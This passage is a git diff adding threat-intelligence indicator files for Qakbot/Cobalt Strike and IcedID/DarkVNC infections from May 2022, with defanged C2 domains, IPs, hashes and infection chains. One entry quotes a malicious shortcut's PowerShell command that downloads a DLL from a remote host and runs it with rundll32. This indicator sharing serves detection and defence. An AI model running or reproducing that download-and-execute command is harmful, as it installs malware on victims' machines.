+TRAFFIC FOR GZIP BINARY USED TO CREATE LICENSE.DAT AND PERSISTENT ICEDID DLL:
+
+- 51.89.190[.]220 port 80 - yolneanz[.]com - GET /
+
+ICEDID C2 TRAFFIC:
+
+- 85.239.61[.]45 port 443 - ganjicow[.]com - HTTPS traffic
+- 135.148.217[.]93 port 443 - callbackhubs[.]com - HTTPS traffic
+- 85.239.61[.]45 port 443 - meanforthen[.]com - HTTPS traffic
+- 135.148.217[.]93 port 443 - eldingdayl[.]com - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 138.124.183[.]147 port 80 - policyupdating[.]com - GET /microsoft
+- 138.124.183[.]147 port 80 - policyupdating[.]com - GET /styles.css?hour=true
+- 138.124.183[.]147 port 80 - policyupdating[.]com - POST /ro
diff --git a/2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt b/2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt
new file mode 100644
index 0000000..36c9f5e
--- /dev/null
+++ b/2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt
@@ -0,0 +1,57 @@
+2022-05-17 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) LEADS TO COBALT STRIKE
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1526664874180456452
+
+INFECTION CHAIN:
+
+- email --> link --> downloaded zip --> extracted shortcut --> Qakbot DLL --> Qakbot C2 --> Cobalt Strike activity
+
+TRAFFIC TO DOWNLOAD MALICIOUS ZIP ARCHIVE:
+
+- port 80 - http://meumundocatolico[.]com[.]br/pla/xmmuite
+- port 80 - http://meumundocatolico[.]com[.]br/pla/U1810259023.zip
+
+URL HOSTING QAKBOT DLL:
+
+- port 443 hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png
+
+QAKBOT C2 TRAFFIC:
+
+- 38.70.253[.]226 port 2222 - HTTPS traffic
+
+COBALT STRIKE TRAFFIC:
+
+- 23.106.215[.]197 port 443 - rizucem[.]com - HTTPS traffic
+- 193.29.13[.]216 port 443 - svfin[.]icu - HTTPS traffic 
+
+NOTES:
+
+- In April 2022, svfin[.]icu resolved to 193.29.13[.]216 and was reported publicly as Cobalt Strike.
+
+- In today's HTTPS traffic, svfin[.]icu is an at-commonName value in certificate issuer data for the associated HTTPS traffic.
+
+MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST:
+
+- SHA256 hash: f9272801e9f70757819b7d49ebd1b09ec846c1119026aacf5e1ea7f7a77e9125
+- File size: 864 bytes
+- File name: U1810259023.zip
+- File location: hxxp://meumundocatolico[.]com[.]br/pla/U1810259023.zip
+- File description: zip archive retrieved from link in email
+
+- SHA256 hash: 31aff7c4ab72817fc99d95cdde8fb48ff743a92b717a13835ce6410d126a7e0e
+- File size: 2,013 bytes
+- File name: Z81310.lnk
+- File description: Windows shortcut contained in above zip archive
+- Shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+  hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png -OutFile $env:TEMP\z222.dll;Start-Process
+  rundll32 $env:TEMP\z222.dll,DllInstall
+
+- SHA256 hash: 8a383f890745370e6f256396858a94062600f1efd2d1df36ef8a291e41494277
+- File size: 1,841,599 bytes
+- File location: hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png
+- File location: C:\Users\[username]\AppData\Local\Temp\z222.dll
+- File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
+- File description: DLL file for Qakbot
+- Run method: rundll32 [filename],DllInstall
diff --git a/2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt b/2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt
new file mode 100644
index 0000000..a184ae2
--- /dev/null
+++ b/2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt
@@ -0,0 +1,80 @@
+2022-05-23 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH DARKVNC:
+
+REFERENCE:
+
+- https://twitter.com/Unit42_Intel/status/1529113268559699972
+
+NOTES: 
+
+- Indications of this infection chain originally appeared last week.
+- It apparently started on Monday 2022-05-16.
+- The Windows shortcut file was first reported at https://twitter.com/malwrhunterteam/status/1526557532277424129
+- The associated files were still available online, and we used them to infect a vulnerable Windows host on Monday 2022-05-23.
+- This infection chain likely used email with a link to the zip-ed Windows shortcut as an initial infection vector.
+
+INFECTION CHAIN:
+
+- URL --> ZIP --> LNK --> HTA --> 64-bit EXE installer for IcedID
+
+INFECTION CHAIN STEP-BY-STEP:
+
+- hxxps://hectorcalle[.]com/May-16_2022.zip --> May-16_2022.lnk
+- May-16_2022.lnkÿ--> hxxps://hectorcalle[.]com/093789.hta
+- hxxps://hectorcalle[.]com/093789.hta --> hxxps://hectorcalle[.]com/listbul.exe
+- hxxps://hectorcalle[.]com/listbul.exe --> C:\Users\[username]\listbul.exe
+
+ICEDID INSTALLER TRAFFFIC FOR GZIP BINARY:
+
+- 94.140.116[.]34 port 80 - hxxp://pilatylu[.]com/
+
+ICEDID POST-INFECTION C2 DOMAINS:
+
+- 45.86.229[.]46 port 443 - guguchrome[.]com - HTTPS traffic
+- 45.86.229[.]46 port 443 - attemptersnext[.]site - HTTPS traffic
+- 5.196.103[.]151 port 443 - hipnoguard[.]com - HTTPS traffic
+- 5.196.103[.]151 port 443 - sawertinoit[.]site - HTTPS traffic
+
+FOLLOW-UP MALICIOUS TRAFFIC FOR DARK VNC:
+
+- 88.119.161[.]76 port 8080 - encrypted TCP traffic
+
+MALWARE/ARTIFACTS:
+
+- SHA256 hash: 547be6f1aebb777b6b729b7b919bb5f7d7f068299f96b92b0b5e601a080c3720
+- File size: 1,206 bytes
+- File location: hxxps://hectorcalle[.]com/May-16_2022.zip
+- File description: zip archive, presumably called from link in malicious email
+
+- SHA256 hash: 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9
+- File size: 2,559 bytes
+- File name: May-16_2022.lnk
+- File description: Malicious Windows shortcut to install IcedID malware
+
+- SHA256 hash: f59531b810bcbc677907e9fa2be65187b3ee4cd980f633775cc8b2186f3e83d2
+- File size: 130,835 bytes
+- File location: hxxps://hectorcalle[.]com/093789.hta
+- File description: HTA file retrieved by above Windows shortcut
+
+- SHA256 hash: 1e3d10c3c84d7617692174a1f9ae8a658eabb22c7122ef1c8f37f35641ccf7aa
+- File size: 3,000,000 bytes
+- File location: hxxps://hectorcalle[.]com/listbul.exe
+- File location: C:\Users\[username]\listbul.exe
+- File description: IcedID installer retrieved by above HTA file
+
+- SHA256 hash: 28cea90671b362b0c6408c1a031fb571b70f1086a5f40afb1be843d6123ce898
+- File size: 1,337,758 bytes
+- File location: hxxp://pilatylu[.]com/
+- File description: gzip binary from pilatylu.com
+
+- SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed
+- File size: 342,186 bytes
+- File location: C:\Users\[username]\ApppData\Roaming\LiquidSausage\license.dat
+- File description: Data binary used to run persistent IcedID DLL
+- File note: First submitted to VirusTotal on 2022-04-15
+
+- SHA256 hash: 327006b939627d1300906e10ec00cae6092d97929b104af552c2bd18882f7df3
+- File size: 994,816 bytes
+- File location: C:\Users\[username]\ApppData\Local\[username]\fupodb32.dll
+- File description: 64-bit DLL for persistent IcedID infection
+- Run method: rundll32.exe [filename],#1 --om="LiquidSausage\license.dat"
+- File note: Made persistent through scheduled task